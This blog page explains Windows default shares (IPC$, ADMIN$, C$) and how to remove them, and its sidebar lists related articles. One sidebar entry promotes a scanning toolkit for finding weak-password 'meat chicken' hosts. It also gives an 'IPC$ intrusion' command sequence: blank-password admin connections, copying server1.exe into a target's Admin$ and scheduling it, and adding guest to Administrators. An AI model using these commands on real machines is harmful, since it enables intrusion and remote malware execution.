计算机上删除c$共享,IPC$、ADMIN$、C$、D$都是什么?如何关闭取消删除Windows默认共享...

最新推荐文章于 2023-10-16 13:53:45 发布
最新推荐文章于 2023-10-16 13:53:45 发布
阅读量1.7k 收藏 2
点赞数
文章标签: 计算机上删除c$共享

在windows 2000/xp系统中,隐藏着一种据说是可以“致命”的漏洞,它让很多人一听到就谈“虎”色变。在“我的电脑”上右击“管理”,依次选择“系统工具→共享文件夹→共享”,就会看到右边窗口中的默认共享。这些带有美元“$”标记的符号就是windows系统默认共享,也就是windows在安装完毕后自动共享的功能,很多人都听说是个漏洞。

★ipc$、admin$、c$、d$都是什么?

ipc$(internet process connection)可以被理解为一种“专用管道”,可以在连接双方建立一条安全的通道,实现对远程计算机的访问。windows nt/2000/xp提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录(admin$)共享。所有这些共享的目的,都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的隐患。

微软在不经意间造成的隐患,引起了很多关注,关于他们的种种说法也流传于网络间。看看下面几种流行的理论,你是不是也有同样的看法呢?观点一:默认共享本身就是漏洞,因此要避免安全隐患,必须删除所有的默认共享。观点二:默认共享就好像普通共享一样,任何人都可以随意使用admin$,c$,d$等共享从你电脑里tou东西。观点三:ipc$是可以删除的,而且不会再次出现。观点四:要想删除默认共享,只要在windows开机脚本中创建一个批处理文件就能实现。(更多精彩内容 请访问萬仟网 www.jb51.net)

答1:既然默认共享是漏洞,微软干嘛不补上?其实默认共享是一项非常有用的功能,只是我们平时用不到罢了。微软的初衷是便于网管进行远程管理。试想一下。在一个大型网络里(pc235.com编辑:建国)。管理员有必要亲自跑到某台机上去看一些东西或是删除一些东西吗?这些管理员坐在主机前通过默认共享可以很轻松地办到。这是微软为了方便管理而提供的功能。不知从什么时候开始,它变成人家口中所说的漏洞了。

答2:如果你开放了所有的默认共享。人家就可以利用默认共享到你电脑里tou东西吗?答案是否定的。除非是你自己想放他进来。默认共享是管理员级别或是有相对应权限的账户的操作。你试试guest级用户能使用默认共享吗?不能!为什么说是你自己想放别人进来呢?你问问自己。你的管理员密码呢?要么直接为空。要么就是些123,1234之类的弱口令。用扫描工具短短时间内就能被猜解的。你已经打开了大门,人家有什么理由不进来呢?

就算是你密码为空或是弱口令,对方也不一定能用默认共享进入你的电脑进行管理员级别的操作。为什么?当共享方式为仅来宾方式时。任何连接的用户权限只能是guest级别的。guest能有多少权限?不信你可以做一次实验。向一台启用了仅来宾且开放默认共享的主机用net use命令进行连接。例如:net use \\ip\ipc$ "password" /user:"administrator"我可以肯定的告诉你:无论你的password填的是什么。都会提醒你"命令成功完成"。你实际上得到了管理员权限吗?答案是否定的。你得到的只是guest权限。很庆幸的是,windows xp安装后的默认共享方式就是"仅来宾"的方式。

墨集薪
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
IPC$入侵攻略
河北正定欢迎您-少占鱼
10-23 1110
一份详尽的IPC$入侵资料利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认
windows默认共享的打开和关闭
热门推荐
远有青山
11-05 5万+
windows默认共享的打开和关闭 Windows启动时都会默认打开admin$ ipc$ 和每个盘符的共享,对于不必要的默认共享,一般都会把它取消掉,可当又需要打开此默认共享时,又该从哪里设置呢,一般来说有两个地方,MSDOS命令和计算机管理共享文件夹,下面主要从DOS命令来设置,因为比较简单,也可进行批处理。 一、因为Windows默认打开默认共享的,还是先从删除默认共享开始吧:
删除默认共享
08-26
删除默认共享:Windows安装后,会创建一些隐藏的默认共享删除默认共享 admin$|IpC$
啊d网络工具包
08-30
DTools SQL是一款啊d网络工具包。 DTools SQL 啊d网络工具包 v2.02 修正版可以用用“IP端口”扫描可以用针对性的查看整个网段的某个打开的软口! 如冰河端口7626,win的共享端口139等 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * 在IP1输入框里双击鼠标左键转到"主机查询" * 在IP2输入框里双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP! * 在程序里,大部分地方都有右键功能! =================================== 文件组成 =================================== DTools.exe 主要的执行文件 Help.txt 帮助文件 Setup.ini 设置文件 IP.^_^ IP数据文件 *.d99 共享资源文件 *.Por 指定扫描的端口文件 1. Ping:判断某IP是否和网络连接的好帮手! 2. 共享资源查找:为你查找网上的共享资源! 3. 常用修改:反恶意网页修改,恢复系统设置等 4. Finger:Finger能为你查询对方系统的用户信息! 5. 端口扫描:使你更加了解对方主机端口的打开状况 6 NT消息发送:向NT的机子发送消息,便用Win介面使用更方便! 7. 路由查看:想知道某IP经过的路由?用本程序就可以给你答案! 8. 进程查看:查看正在运行的软件,查木马还是有一定的帮助的! 9. 本机IP:在上网的时候,想知道自己的IP吗?本程序可以为你办到! 10. IP端口扫描:有针对性的查看整个网段的某个端口,如冰河端口7626! 11. 网卡MAC:快速获取一个网段的 用户名、工作组、对方的网卡MAC地址 12.查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了! 13.网络状态查看:想知道自己机子打开了什么端口吗?本程序可帮上你的忙! 14.域名<=>IP:想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你! 15.远程服务查看:你可以查看和修改远程的服务,如关闭和启动Telnet,更方便! 16.主机查询:想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙! 17.查看用户组信息:Win介面的查看远程机子的用户和组的信息,便用更方便! 18.开远程的:Telnet直截开启微软自带的Telnet,开Telnet,原来也可以这么简单! 19.肉鸡查找:查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便 20.查看隐藏共享:查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便! 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 DTools啊D网络工具包 更新说明; * 强加了远程查看和修改服务功能。 * 强加了查看隐藏共享。 * 强加了查看用户和组信息。 * 强加了NT消息发送。 * 强加了远程开Telnet的功能。 * 强加了查错误代号说明。 * 价面作了修改。 * 修正了在IP1里不能用快捷建 "Ctrl+C" "Ctrl+V" 等问题! 使复制和粘贴更方便! * 软件介面大小可以自由调整!使用更方便! * "肉鸡查找"增加了识别对方系统版本功能!使"肉对查找"有更体贴的感受! * "木马种植"可以只在对方系统添加命令,而不复制文件!就像远程Telnet这么好用! * 修正了"主机查询"的读取某些追捕数据文件会出错的问题! * "网络状态"的右键菜单加入了"查看所有端口所明",想知道你的机子打开端口的说明,一按就全知道! * "路由查看"增加了"显示域名"和"显示对方IP所在地"的功能,了解路由机子的信息更方便! * "共享资源查找"增加了"自动保存"! 当下提示:在主机框里输入IP将会在全部的IP框中加入刚输入的地址!在IP框中输入IP也会把IP加入主机框中!这样才会减少了复制、粘贴的工作量!
删除xp默认共享 上网更加安全
09-15
1,打开记事本输入以下内容: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] "AutoShareServer"=dword:00000000 "AutoSharewks"=dword:00000000 保存为.reg文件。 2,打开记事本,输入以下内容: net share c$ /delete net share d$ /delete net share e$ /delete net share f$ /delete net share g$ /delete net share h$ /delete net share i$ /delete net share j$ /delete net share ipc$ /delete net share admin$ /dele net share h$ /delete net share i$ /delete net share c:\windows\system32\spool\drivers /del .......................... (有几个盘写到几个盘符。) 保存为.bat文件。 先运行上述的.reg文件,再运行.bat文件。这样默认共享就会被彻底删除,重启也不会再出来。
学习笔记-IPC$(Internet Process Connection)
人饭子的博客
11-05 1466
IPC$(Internet Process Connection) IPC$ 的概念 IPC$(Internet Process Connection) 是共享 "命名管道" 的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限, 在远程管理计算机和查看计算机共享资源时使用。 利用 IPC$,连接者可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主...
Windows服务器等保测评(三级)作业指导
枪菜且白给的博客
08-09 5683
本文章旨在讲解Windows服务器等保测评(三级)等保测评要求。
详细了解IPC$命令, 防止IPC$入侵、攻击
言出必行
09-08 3568
IPC$命令详解  一 摘要  二 什么是ipc$  三 什么是空会话  四 空会话可以做什么  五 ipc$所使用的端口  六 ipc管道在hack攻击中的意义  七 ipc$连接失败的常见原因  八 复制文件失败的原因  九 关于at命令和xp对ipc$的限制  十 如何打开目标的IPC$共享以及其他共享  十一 一些需要shell才能完成的命令  十二 入侵中可能会用到的命令  十三 对比过
IPC$关闭原理和步骤
12-16 4408
IPC$ (2010-04-23 15:15:03) 转载▼ 标签: 杂谈 分类: 我的收藏 IPC$是共享命名管道的资源。在微软系列的操作系统中,为了让进程间共享通信而开放的命名管道。用户通过提供可信任的帐户与口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 所以,IPC$共享命名管道设计的意图是好的,也确实给管理员带来了方便。但是,由于其存在一定的漏洞,这也让黑客有机可乘。现在一些针对IPC$漏洞的攻击方案就有一大堆。有些甚至没有
Windows系统IPC$共享与勒索病毒
abraham76的博客
03-31 7128
  不同的进程各自有着不同的地址空间,每个进程的全局变量对其它进程是透明的。因此进程间要进行数据交互就要通过内核,在内核中开辟一块缓冲区,每个进程只需把要共享的数据拷贝到缓冲区即可,内核提供的这种机制称为进程间通信(IPC共享命名管道   关于进程间通信(InterProcess Communication),管道和共享内存为大家所熟知,包括匿名管道和命名管道。Windows系统的IPC$其实就命名管道的一种应用,考虑到它用于不同设备间通信,所以可以翻译为Internet Process Connect
啊D网络工具包(最新)
03-17
::: 啊D网络工具包 帮助文件 ::: 软件功能如下: --------------------------------------------------------------------------------- 1. 共享资源查找 [为你查找网上的共享资源!] 2. 肉鸡查找 [查找一个网段NT,...
windows2003 服务器安全配置的建议
01-10
删除Windows Server 2003默认共享 首先编写如下内容的批处理文件: @echo off net share C$ /del net share D$ /del net share E$ /del net share F$ /del net share admin$ /del 文件名为delshare.bat,放到启动项...
啊D 最新破解版 网络工具包
08-21
copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在...
Web服务器安全加固步骤.docx
06-07
Administrators(完全控制) System(完全控制) 禁止C$、D$一类的缺省共享 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters AutoShareServer、REG_DWORD、0x0 禁止ADMIN$缺省共享 ...
啊D网络工具包
02-24
啊d网络工具包是可以用用“IP端口”扫描可以用针对性的查看整个网段的某个打开的软口!如冰河端口7626,win的共享端口139等 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * ...
取消共享资源 print$、C$、D$、admin$
weixin_59450851的博客
10-16 511
1、regedit注册表—>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters—>新增DWORD键值—>AutoShareServer和AutoShareWks值为“0”—>重启,使用net share查看;IPC$隐藏共享使用以下注册表无法取消。2、开始—>Windows管理工具—>服务—>重新启动server服务。
开启admin$共享
weixin_34235457的博客
04-30 9436
运行regedit,进入下面键值: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters,新建 AutoShareWks,以及AutoShareServer两个键值,选择REG_DWORD格式,赋值为1 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Cont...
第0篇 如何访问win10的C$等默认共享
weixin_30270889的博客
06-16 3478
  近日换新机器,装了win10,但想从旧机器访问win10的\\ip\D$拷数据过去,首先发现怎么也连不上win10的共享,于是把win10防火墙中“文件和打印机共享”的“专用”(即内网)勾选上终于可以连上了。   但又发现用我新建的账号(管理员权限)也无法访问\\ip\D$,尽管\\ip已经可以连接上去了,经过多次尝试终于发现只有用administrator(且有密码)才能连上win10上的...
net use \\192.168.3.20\IPC$
最新发布
04-19
IPC$是Windows系统默认共享的一个特殊共享,它提供了一种访问远程计算机的方式,可以进行一些管理操作,如远程执行命令、访问共享文件夹等。 使用net use \\192.168.3.20\IPC$命令时,需要确保本地计算机与远程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值